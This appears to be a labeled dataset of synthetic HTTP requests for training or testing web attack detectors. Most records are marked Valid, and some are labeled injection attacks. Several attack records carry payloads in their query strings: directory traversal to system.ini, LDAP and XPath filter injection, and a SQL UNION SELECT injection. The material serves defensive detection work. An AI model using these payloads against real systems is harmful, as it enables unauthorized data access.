Date: Fri, 19 Sep 08 19:34:02 CET
Expect: eoirsren
From: imeqTeI@ieix.be
If-Unmodified-Since: Sat, 17 Feb 07 04:32:05 CET
If-Match: "J7yYKXLte6Dwf1mG"
If-Range: Thu, 15 Mar 07 16:41:22 GMT
Max-Forwards: 270
Authorization: Digest uri=/ctlt8nN/ebehi5nY/iuanm/eaiirn.ace
Referer: http://8seIo.de/seidekeg/krdtsa.avi
User-Agent: hdoslb5ungxAoqes
UA-Pixels: 0869x247
Transfer-Encoding: deflate

null

End - Id: 40369
Start - Id: 17559
class: Valid
GET /tJ@Wmrx4QNA23ljzO8.shtml?ra3RS5QHhqxml=awinntKdzEtemi+servicestoFaE&5KO@1.CmBJinputb=rVuHOp&otehl5a1ae=7hvgFllGDr&xmbgsound1g087I=eooe3rrocdaof&akiola5eN=94600504&wc1oswn81S=s&window.openE3xG_cPpSDE=51417290&eR=e9mpgfAZ8 HTTP/1.0
Host: www.parsn9sEe.st
Connection: aoasatkn
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, deflate;q=0.5
Accept-Language: xio-eys;q=0.1, 2Y-nlg;q=0.1, pii-lj2;q=0.9, ooue-4T;q=0.9
Cache-Control: no-cache
Client-ip: 125.162.132.243
Cookie: oSgFp=2929468130
Cookie2: $Version="56"
Date: Sun, 22 Aug 04 04:16:05 CET
ETag: "yFsCQA0qcZwD8_Euq"
Expect: 100-continue
From: iqint@araarG.gov
If-Modified-Since: Sat, 25 Sep 04 24:46:32 GMT
If-Unmodified-Since: Mon, 22 Sep 08 13:02:46 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 517
MIME-Version: 5.6
Pragma: gwoLir='Mraae'
Proxy-Authorization: NTLM cnowbm10bDJkdHZldWFucmxmeVdkdmh0V2UzbkFpb3JyZGFiU29hcHQ3cnRlYm4=
Authorization: usobak aruWyt=Eohf1me1
Range: -848823,71971-191917
Referer: http://ehds.cz/h9ceaa/Ezlsits/ani02s/hu4Io/eeSL.png
TE: chunked;q=0.5,trailers,trailers
Trailer: Range
User-Agent: Mozilla/6.9 (compatible; es0qdeth; Open BSD i386; uylppzOem7; ehtturMwwm)
UA-CPU: StrongARM
UA-Disp: 037,032,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 845x6872
Via: 5.7 218.216.141.77
Transfer-Encoding: identity
Upgrade: exste/9.1
Warning: 064 www.mgwo.jpeg "tuga" 
X-Forwarded-For: 45.156.172.168
X-Serial-Number: 2432854713
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17559
Start - Id: 9017
class: Valid
GET /taiaIcDykgeooeAsoi/h3CUiLhkFOYERtX/hpoaostnomabAu/sxRh3rnp95onu9.msf? HTTP/1.1
Host: 114.59.153.141
Connection: edet
Accept: */*;q=0.5
Accept-Charset: iso-8859-4, iso-8859-1, x-mac-arabic;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: max-age=937
Client-ip: 28.236.104.175
Cookie: 3gslYitioe=41395
Cookie2: $Version="71"
Date: Sun, 05 Feb 06 24:18:52 GMT
ETag: "26I2bIFFiv32dP3m"
Expect: rsna=taeheo4;iaiNrrni
From: moihss@1tlab.fr
If-Modified-Since: Sat, 30 Dec 06 04:00:30 CET
If-Unmodified-Since: Wed, 12 Dec 07 16:42:04 UTC
If-Match: "IBjZGZQcuaZXxQPjr"
If-None-Match: "PAYcFawMEcPw-qEP"
If-Range: Mon, 30 Nov 09 06:14:41 GMT
Max-Forwards: 1
MIME-Version: 0.6
Pragma: aepsiD9e=lmsit
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: Digest opaque="notrsDib"
Range: -751,66639-06
Referer: http://wrte.it/saa8/hvhdsni/nia6gtmi/vlekd5so.pdf
TE: trailers,deflate,trailers
Trailer: From
User-Agent: Mozilla/4.7 (Machintosh; U; PPC 2.3; ad-wE; rv:2.3.6) Gecko/56005707
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7425x380
Via: 3.0 7.139.119.50
Transfer-Encoding: deflate
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 289 www.mbxzf4og.jpg "eAnhnsteieeelokc4" "Sun, 04 Jun 06 15:45:48 CET"
X-Forwarded-For: 111.61.129.208
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9017
Start - Id: 27819
class: Valid
GET /tFnodeSwh-g/sgIx-POcTJ@d8mPj39Qc/It5xOsgldpcLE/jFA00Rnrlo/5App/mFJ7PxTGTR9e_fc5/sVFFvrVHzx/ny.gif?ed=aHhperl&tn1it=pmniRszioxnrwgaI HTTP/1.0
Host: www.ab17hy.st
Connection: close
Accept: image/png, image/png;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: ngeNinpo-62he9kxP, emtsk-oim;q=0.2, nsln6fu-mE;q=0.5, en9-iA;q=0.0, sssTb-ddmt
Cache-Control: no-transform
Client-ip: 102.45.50.188
Cookie: wgetb0a8vwp-kR.=nTr5t;ntPer=:apyvpositionnitdX;ld0s=4845133
Cookie2: $Version="90"
Date: Sun, 07 Dec 08 12:33:00 UTC
ETag: "BE-hvVdIQ08mEqst6JOc"
Expect: 100-continue
From: Iaitkel@rOtuy.it
If-Modified-Since: Sat, 04 Sep 04 21:46:29 CET
If-Unmodified-Since: Wed, 27 Jul 05 18:14:30 CET
If-Match: *
If-None-Match: "5O8YMCAotDR8RL_Yn"
If-Range: Mon, 17 Oct 05 22:45:35 GMT
Max-Forwards: 498
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM bm1pbmVuZUM4cmhhc2VydWF0aWV2cm1vbmNnaW1hc2VzdHZ3Z2xE
Authorization: gL7a Tdtbasw=4EUjtv2
Range: -84,186-,1747-
Referer: http://www.yodsioa.uk/tqip/5antm.txt
TE: deflate,deflate;q=0.7,trailers
Trailer: TE
User-Agent: fOhtar (ipxNnDldbv; iC63V.z; e7GsWg)
UA-CPU: x86
UA-Disp: 626,6964,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 370x5547
Via: FTP/4.2 190.170.118.246, 37fkkh/4.7 www.7tnHn5.html:1476
Transfer-Encoding: compress
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 27.223.128.62
X-Serial-Number: 9975716182184282861
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27819
Start - Id: 37344
class: LdapInjection
GET /4ecaxnu/a17yU2VjnwrDaQj/.FF0tT/wttv7gCrE_-C@bM/Hsn.css?EGYcsoCV=5867677&mielW6al=ihomej%3Fifgxs+thtt&raeopystAab=7559301460&onufatKtAee=entiboot.ini&3s1dQunion=welike6&uiIrolql7Tr7ein=aDw&MyTeAdta5sra=8924&6litmeTgoSa=aF5gMn1z&Aytt=19009509&ox=l&ei=lH&xtD-UIevalZK=2m7Sn+nr&aesoeNasur=eKu%40o1z HTTP/1.1
Host: www.qeeE.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: )    ( |    (baasi=SA*)
Accept-Language: ncw-Tg
Cache-Control: no-transform
Client-ip: 57.5.226.35
Cookie: ddtedmjkahas=147;cg1etEiTl=596594;eyeh=es+mocha
Cookie2: $Version="7"
Date: Sun, 31 Aug 08 02:24:05 GMT
ETag: W/"HksXsoHOvHtSNPYgMC"
Expect: tweTge
From: elbo@eieuetfntT.fr
If-Modified-Since: Sat, 07 May 05 13:17:23 CET
If-Unmodified-Since: Fri, 31 Mar 06 18:16:10 UTC
If-Match: *
If-None-Match: *
If-Range: "U9sICyoJWi@jK-N"
Max-Forwards: 8
MIME-Version: 7.2
Pragma: smLhnee=rtho
Proxy-Authorization: NTLM N2RvZ3JvaElyc2k2Tjg4YjRhZjltbDh0dWo1aXllbGRJb2VzdWludmVl
Authorization: eesos squiMtiM=e8thrye
Range: -04795,-66
Referer: http://www.nNfe3t.cz/iecnoc/Iss9c.pdf
TE: deflate
Trailer: Range
User-Agent: brIsnsisj (i2bav3; tCievLd; 6ELYv-J)
UA-CPU: x86
UA-Disp: 654,6538,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: 0.6 www.yIhl.html, 1.3 243.243.53.55:5
Transfer-Encoding: compress
Upgrade: Trf/4.1
Warning: 830 www.ane2.html:1 "vjdynls" "Sun, 23 Nov 08 23:13:16 CET"
X-Forwarded-For: 172.124.5.186
X-Serial-Number: 06549032
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37344
Start - Id: 14738
class: Valid
GET /Tstoesua5idohtsefec/8.K_Lqjxp2-y5orUK95b/ees3o/yTT7J5vAycopyr1yT.js? HTTP/1.1
Host: www.bsryeytl1.de:9
Connection: 2yswmK
Accept: */*
Accept-Charset: koi8;q=0.1, cp-950;q=0.9
Accept-Encoding: 
Accept-Language: eher-tcr, teeee5E-sgsrSrc;q=0.6, sohts-cai;q=0.7, t8rite0m-dc;q=0.6, r82ea-M33hm4as
Cache-Control: max-age=8
Client-ip: 225.236.118.85
Cookie: mSbXhtaccesfu=n';ulkuyreisc=omOUtalUplpeeX4;ocnn0h=aKV7m-;zrtKruJmejth=gJ79dGSrr;choo=i8dye;elxvaebanceczp=tV
Cookie2: $Version="50"
Date: Tue, 22 Aug 06 15:13:19 UTC
ETag: "0Lb5LqNJ284BVV3Fa."
Expect: apgt6i=cyhe;gTtU=lrhkcl
From: sNpNf@3hhoojc.uk
If-Modified-Since: Sun, 11 May 08 20:05:46 UTC
If-Unmodified-Since: Fri, 27 Apr 07 03:34:55 UTC
If-Match: "aVdI45vCyF-aPeWjG"
If-None-Match: "JteIEYw0ggdmJVjB"
If-Range: Wed, 02 Apr 08 22:42:02 GMT
Max-Forwards: 61
MIME-Version: 4.5
Pragma: mzswiEt=ikaz
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic ZW5lc2FlOnJuYnJ5aGQ=
Range: 444847-,76-,3-393
Referer: /nwhmirm/1orai/ipnNGmj5.exe
TE: trailers
Trailer: Accept
User-Agent: nO4IaO/3.1.3.7.0
UA-CPU: StrongARM
UA-Disp: 6549,336,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 887x095
Via: 0.1 130.57.32.115, ele/7.9 www.wona3t.jpeg
Transfer-Encoding: gzip
Upgrade: soe9td/9.1, sezN/9.4, ep6a/2.0
Warning: 491 www.jeuiAh5t.htm "wjeodstn" "Wed, 27 May 09 09:21:52 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14738
Start - Id: 2115
class: Valid
GET /hxXsEqg1H9/hfs/eTw9apeQ2Xanl/tr/zisqRmnclgcEsywa/sIetlntttrrepeu/Ahrnanhrsd.nsf? HTTP/1.0
Host: 224.64.227.3
Connection: bie6marg
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 2.229.12.61
Cookie: seserbiieIrod=e1y| ;yg1rsYpD=68897;amgqlw=e6KHP97NtLI
Cookie2: $Version="5"
Date: Sat, 08 Oct 05 15:11:21 GMT
ETag: W/"PkiXyIMVpqvo_R_eDskr"
Expect: uuad
From: n8maf@29wgo01.de
If-Modified-Since: Sat, 08 Dec 07 08:01:14 GMT
If-Unmodified-Since: Thu, 03 Dec 09 16:58:36 UTC
If-Match: *
If-None-Match: *
If-Range: "2LGmtzhDlUC3tFE@"
Max-Forwards: 3
MIME-Version: 1.6
Pragma: fu3vgF='3N'
Proxy-Authorization: Digest qop=auth
Authorization: drweoc nre80a=ldaeuO
Range: -93,4514-2
Referer: http://nwyn.biz/rsliqde/umeoissh.css
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.6 (compatible; MSIE 5.1; Open BSD i386; lyhl3bip)
UA-CPU: Sparc
UA-Disp: 4115,383,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3159x969
Via: 7.3 239.109.228.106
Transfer-Encoding: muqaad
Upgrade: LqnoEm/4.0, 2Odnr/2.0, ioip/3.7, qMe/8.4
Warning: 551 www.azMe.gif "eLopsrhhmd3yte9t3h" 
X-Forwarded-For: 138.19.39.77
X-Serial-Number: 86831
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2115
Start - Id: 1509
class: Valid
GET /8sdi1py/axeRexbu5jrlebR/niT_2en/crrstOo5gei56e/gnon5misttita/iaUHTtYJmtkG-4d9n/tk2fONIESo5TyIv.msf?nnScRuntl5hezp=15722072&ogtn9arIwccu=dOFmST85Z%40&hOee1w0=A%3Ahizo%3Ail%28a&dnt1jeasngneyp0=snrrEs6eomochau0hn HTTP/1.0
Host: www.slh0neg.be
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: 2bt9ah-o;q=0.1, tntedei2-As;q=0.1, kUmdstjT-hrrbferI, 9-r;q=0.5
Cache-Control: max-stale
Client-ip: 188.65.133.118
Cookie: uiht=H0s;tftsYsas5ole4t=7222849;ujdtesshr=eJh;hit=tZxxdm;hhpcw=6695966
Cookie2: $Version="3"
Date: Fri, 12 Jan 07 21:00:25 GMT
ETag: "DD_J7VddGfVdxHg_MS"
Expect: 100-continue
From: 5zeI8@rhKaeemAo.st
If-Modified-Since: Tue, 20 Apr 04 12:16:08 GMT
If-Unmodified-Since: Thu, 15 Jul 04 19:33:23 UTC
If-Match: *
If-None-Match: "cVLJD_2S2TB.Lkf"
If-Range: Tue, 25 Sep 07 20:24:33 CET
Max-Forwards: 28
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM Z2VzVEh6dmlxdHRlYXN5bTY3bmNhRGphY2h0b253NnRmaHJ0VGFFMw==
Authorization: NTLM bGU3bjdhaXBMVGZlbmFkamRPaW5nblkzalkxaGQ4dmFkaXRFTmlsaQ==
Range: 460-9787,-3
Referer: http://www.auhbyptr.net/atastMTr/sdt6ert/aaen/tmanlae/u1ns.cgi
TE: deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: ceshjeteaneT6s
UA-CPU: MIPS
UA-Disp: 679,166,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1994x755
Via: 8.7 www.l3ea.png
Transfer-Encoding: compress
Upgrade: ma3Ld/8.0
Warning: 564 www.ellu.jpeg:2 "Sei8d" "Thu, 27 Jul 06 21:37:43 UTC"
X-Forwarded-For: 234.233.233.38
X-Serial-Number: 894892
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1509
Start - Id: 45458
class: PathTransversal
GET /CF/t7zKuCC6/yqBGpth3l/il0U3-Tlwo8IFY/utcXs4Y/eYvILU5N-xSNY9a/nniaw4hro/Hj/yhQ3V6qGecQ/crnGQ.mspx?copyoLfromaRk=sN4yod5ToKbO&ofoaibaoaOeUo8h=whjsibiahnt&nRkte5esstutlw=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&6Zawtelnetqc6ru=8632982&4Y4ROrbMjojC=786368&7ABopen=639&qprocessing-instructionGgroup by=585&qmc2dpsservicesdexecwhereH=TuldaeEahn3&is8bc4beobeOw=6853569&ioicehwcn=2749&phwhrMETnps=tzhpho&naTpfNn6akn=uoefrt6ftmmN&lohppnluit5bpic=rrdxmlhsq%3C&mnedkftuUDSa=hrf&eN7ekidamias5fn=h0T0etEpndd%5CV%3Da HTTP/1.1
Host: www.aomsnaeia.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress
Accept-Language: *
Cache-Control: max-age=824
Client-ip: 140.149.19.126
Cookie: ieont=elaqntnHtmnb;ujwenciacns=etjia8eehrT0Ltn;fYqAmetaPJb3n9s=o2s;srniTamIexdx=nbb6j;lgfmtektiD=rS3qg;uN=0h
Cookie2: $Version="0"
Date: Mon, 14 Jun 04 22:30:38 UTC
ETag: W/"o8fx-z1BO6xcIq.EZFb"
Expect: 7aodw=teyst
From: wXuowl@fhcnteilt.be
If-Modified-Since: Thu, 31 Jul 08 06:23:31 GMT
If-Unmodified-Since: Fri, 01 Sep 06 21:38:03 UTC
If-Match: *
If-None-Match: "rKCaYVSDhk39upEG"
If-Range: *
Max-Forwards: 2
Pragma: eN='8'
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: NTLM ZWxoczdkM3J0aHNSeHNkeWJ0c29lZW1obGFuek50NGhy
Range: -884,93-882862,81022-507
Referer: http://www.sojnrt.it/leane/iTln.mpeg
TE: trailers,trailers
Trailer: Host
User-Agent: nGrteoec
UA-Disp: 5444,1005,8
UA-OS: Win9x
UA-Color: color8
Via: 4.8 www.ocwfdia7.jpg:7894, olkan/6.1 171.27.90.190
Transfer-Encoding: compress
Upgrade: hEeeb/4.0, soleud/0.6, ehm/0.2, cpan/9.4, iieSr/7.6
Warning: 772 13.181.197.72 "EhhrrueNfweeetlyl" "Sun, 20 Dec 09 03:55:23 GMT"
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 347804024892974921
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45458
Start - Id: 5918
class: Valid
POST /ebdtyfwyH7d/oMrsqi/ifwaa80Gu2@zR-3foF/Bu88aetcOg6@0qvar/ImVAt3VULhomesamK/lscdRThBv.PdXgfP5bA/wH@QXaccept6uJ@/aT3oXnBGimO-0x/_Tzz_gHnqNPvarposition/ecdd8ae.html? HTTP/1.0
Content-Length: 51
Content-Language: iyIae,nz4i
Content-Encoding: identity
Content-Location: http://onlet.ch/erst1/nmlnla4e/ethent1.mspx
Content-MD5: dWVkdGlMbmxuY29sZm1kcg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Mar 07 02:05:15 UTC
Last-Modified: Tue, 26 Jul 05 03:55:23 GMT
Host: www.tra9dsaig.be
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: kseang6-yaei6bks, Eud-e, q4se-ansmsh, sambtu-hi7pe7;q=0.6
Cache-Control: no-cache
Client-ip: 35.87.71.24
Cookie: Zyr9K_LOzUZK=hizn;iudtRgrt=p)o2Ndtd;d6.Lq2Wrm-re=enccatBoco ;e2tO36gmwrgdn=ltuEoyM36Ylc;aohrbai=93337490
Cookie2: $Version="19"
Date: Sun, 27 Jun 04 24:44:28 UTC
ETag: W/"6gSWAW_cdI7UAz0O"
Expect: 100-continue
From: nnLtl@deqEoue.st
If-Modified-Since: Tue, 01 Jun 04 11:01:44 UTC
If-Unmodified-Since: Fri, 16 Jul 04 20:35:31 GMT
If-Match: "rJu0K_4MhI4iso5E"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: telm te2ontt=issaxe79
Authorization: Digest nonce
Range: 891141-,22-,356-
Referer: /jO26e4d/6p2edd9.pdf
TE: gzip;q=0.3,gzip;q=0.5,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.4 (Windows; U; Win 9x 9.2; or-ig; rv:5.0.3) Gecko/91458752
UA-CPU: PowerPC
UA-Disp: 860,981,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2011x601
Via: 8.0 www.rtoM3oha.html
Transfer-Encoding: Rr5n; rso8at=Dnagaq
Upgrade: rct1/3.4, bcattq/1.0, ipaQo/9.6, n3hhl/7.2, nSfe/9.3
Warning: 158 www.Soesrna.shtml "fXsfapHcCemqopregauo" 
X-Forwarded-For: 81.125.98.15
X-Serial-Number: 673720584538972
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iuc=roe n&jtDn=rroe\tc&29tUnEgws=rson?ma0a h;

End - Id: 5918
Start - Id: 38598
class: LdapInjection
GET /eSOb3kjef46JzfPDRbK.jpeg?str=ot84oze2stsw&H9aNn5uSyi=7i4wh&xbeneto=383&7ilswywadixpb=oP%40-kd&6m32JDVN4=66%29%28%26%28objectClass%3Dnew%29%28%7C%28sn+%3D+++wo%29%28cn%3DiiN+++++J*%29%29&qsCte1EiteXo=hatdsu&trdiuTufo=237132096 HTTP/1.1
Host: www.zeSbb.st
Connection: Etci
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: sa4i3o-Sndota;q=0.1, sd-b
Cache-Control: zHl3Umdo='b'
Client-ip: 158.4.8.166
Cookie: MtmpFtelnetAJ7b3Uecho=9aas;tct=p%cxmlas ;nOMHwdefaacnpx=4nDL694Y0;eEg0aa=58;U8npC=iaschAmStuiak
Cookie2: $Version="7"
Date: Mon, 02 Apr 07 15:41:59 UTC
ETag: W/"O.bTOUSMU2LLu9X"
Expect: 0saert
From: Henr0sl4@nexht.fr
If-Modified-Since: Fri, 05 Mar 10 21:06:24 CET
If-Unmodified-Since: Mon, 24 May 04 23:58:04 UTC
If-Match: "Mzkuq8S0k7I0WV5B9nYe"
If-None-Match: *
If-Range: Thu, 20 Jul 06 06:10:57 UTC
Max-Forwards: 562
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: NTLM ZGFyVHN0MWxpYW5nZWxpcDBuc3JyYWZldGV5aWJhbDVuZWQ=
Range: -348176
Referer: /snaAdyO/afiN.mpg
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: opeTost2etmifnu
UA-CPU: 68000
UA-Disp: 761,265,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2971x6869
Via: da8yvH/0.6 138.246.109.48
Transfer-Encoding: identity
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 619 187.93.166.222 "etLesebuo9iioii" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 379109696738614
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38598
Start - Id: 49147
class: XPathInjection
GET /djH4zZzr7X_73mdgDVH/cDg1reYcdDUcU6-.tiff?tjeoH=rcd%2Foujs%2FyMm%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D4%5D+++++%7C++een7t%2Fld%2Fyahe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D815%5D++or++++%27ea6%27++%3D+++%27&ghsphs8issZij=TuzeaOAstyle&hsttashyhz=910943&eneoNenER=9 HTTP/1.1
Host: www.iiala.com:80
Connection: close
Accept: image/png;q=0.9, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.5, gzip, deflate, identity
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 204.49.188.29
Cookie: ofendeo=4;Mkqof=audirXytk1ldresI0m
Cookie2: $Version="3"
Date: Thu, 08 Apr 10 16:18:33 GMT
ETag: "HjF@45Djy@lcchXqG"
Expect: cnapd=5nhiuzm;etnii
From: lrSasae@aaar.net
If-Modified-Since: Fri, 19 Aug 05 09:57:37 UTC
If-Unmodified-Since: Sat, 21 Jul 07 15:28:10 UTC
If-Match: "f2yUZHY6lPmZ@yt.IPm"
If-None-Match: *
If-Range: Wed, 21 Jan 04 23:03:21 CET
Max-Forwards: 3
MIME-Version: 0.8
Pragma: lU5tl=y
Proxy-Authorization: rtra9 ieayrnr8=mdixsqo
Authorization: hhoen nmCrg=ecche
Range: 4916-
Referer: /cietAde/oqiin/amtAl/ifzb/ssja.rar
TE: trailers
Trailer: Host
User-Agent: lyhorb
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: FTP/3.4 212.40.5.91:50280
Transfer-Encoding: compress
Upgrade: oredo/3.8, 9ele/6.1
Warning: 384 www.rticla.shtml:33631 "lrerokniaeoes" "Wed, 18 Jan 06 05:57:49 CET"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49147
Start - Id: 41650
class: SqlInjection
GET /laitrqhsEgttajeo/_w.2/dropoHxp_i/4nhcdaOems/cogvk8daabiee/YxVSxEwr7kallexech/Aumoauhple/wmLrKuNCM/aiHlRswahststeiili/io5hl.php?nA-H2tYUphpPwY=ehspl3aanwnm&a6l=tyote+ba%24taidktt&nlsrohopt=%27+%29+++UNION+++++ALL++SELECT++1%2C86%2C57%2C4%2C60+++FROM++toomssx+++++WHERE+++%28+%27%27%3D+++%27&keoa5ttfardi1t=03&Ncpnealns4rn=tv&DiJS4csM=52&awia=saegctlO9obmn&aou9tL=niceoeIN0uaneCm&mUC@u_pxhtpassaA=772780140 HTTP/1.1
Host: 200.213.169.86
Connection: ewhtor1
Accept: audio/basic
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: bsiirpn1-6roRlsv;q=0.7, 9a5iycw-Hrb
Cache-Control: only-if-cached
Client-ip: 99.181.248.40
Cookie: bi7asdsdiet6nn=6h:00Dtsrpr8TtNR;OedllV0yk=3084
Cookie2: $Version="52"
Date: Sat, 15 Oct 05 03:06:34 GMT
ETag: W/"DYrqCWSJ5vu8_ST"
Expect: tt48=sne4our
From: vlIol@haea.org
If-Modified-Since: Sun, 09 Nov 08 16:47:01 GMT
If-Unmodified-Since: Fri, 10 Nov 06 03:57:54 GMT
If-Match: "LEzqAFa7yk0vBPVtcqbj"
If-None-Match: *
If-Range: "b7a4y_incQ3X85IN"
Max-Forwards: 7647
MIME-Version: 7.4
Pragma: y1nyat=Ti1be
Proxy-Authorization: NTLM bW9zbzZtbGVydGMyZXM3RW1vaXRSNGR1b2hyem51ZXY=
Authorization: NTLM czFmZHVhbW9pc281c2lyMWVyZUVoaWxhNU9ucWVsczB0TUJuOHVlbGJMaWhl
Range: -11289
Referer: /naoacte/nbeBe/prYt1h/cioq.conf
TE: gzip;q=0.8,trailers,chunked
Trailer: Trailer
User-Agent: Ftyg (2M1mH5Y_; w3lDve86L; tj_61EA._-; dYkYyW6; tg4@Ar)
UA-CPU: MIPS
UA-Disp: 942,8019,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 355x361
Via: HTTP/4.3 38.129.21.85
Transfer-Encoding: compress
Upgrade: tzc/6.0, rs1/4.3, rie/8.9, al5/8.8
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41650
Start - Id: 3574
class: Valid
GET /Qe/pya/MO/t9l8mPm/ROY%uf@openY9C-/okommth/jWNMoCS9WFD5O4/e4hteYoR/.2k/maatsal1eocnm2ia/4FZ-0rx4/JeRweeiinAXnumrCwen.shtml?hlc4=esaamtereaanin&rcn=e6r&tscriptwhereQHmAGIO3=uim9K&qursd=79684722&AsHSsopd=dtoopencrcp+%7Cnntra%7Cs&tjidre=sPh7ix55aV3&Us=865sE8ryhysd8lro&Ee3mm6atoo=s&NsQoBlocationChttps.q=cQ0d97x8CgD&or=ithavingow HTTP/1.0
Host: 25.170.144.153
Connection: tlyehs
Accept: */*;q=0.7
Accept-Charset: windows-1258, shift_jis, iso-8859-5, iso-8859-7;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 190.190.63.225
Cookie: sgolc=5752;gusaetedaEphorx=2cetweaiax2c3leru
Cookie2: $Version="203"
Date: Sat, 05 Apr 08 05:33:16 CET
ETag: "7-eU86bkPtOKPvlQs7dM"
Expect: ymirg=sGd2;oedel
From: a0eenp@wei1eahwB.com
If-Modified-Since: Tue, 30 Nov 04 09:17:58 UTC
If-Unmodified-Since: Sat, 29 Jan 05 24:22:18 CET
If-Match: "aSa.EVdn68896xAZP3"
If-None-Match: "kQjJ4LmBu8Ix741x"
If-Range: *
Max-Forwards: 4
MIME-Version: 5.0
Pragma: 0relhepo='e7gh1'
Proxy-Authorization: Basic b291ZGFvOjRFcmgzdGU=
Authorization: wgdpe iBen=Iili
Range: 285-321592,-0,1-98
Referer: http://www.ewuAO.com/jnteipn/NirA.wav
TE: gzip;q=0.7,chunked;q=0.0
Trailer: Pragma
User-Agent: Mozilla/1.0 (compatible; eysd; Open BSD i586; aadlelegdc)
UA-CPU: MIPS
UA-Disp: 481,666,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 047x6463
Via: 2.0 www.icbmh.js:0354, FTP/9.5 53.206.131.92, HTTP/8.1 www.ntbaiat.html:851
Transfer-Encoding: so5l; rmr3=rreol7
Upgrade: de4/4.9, rrhfau/6.1
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 399935744
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3574
Start - Id: 49250
class: XPathInjection
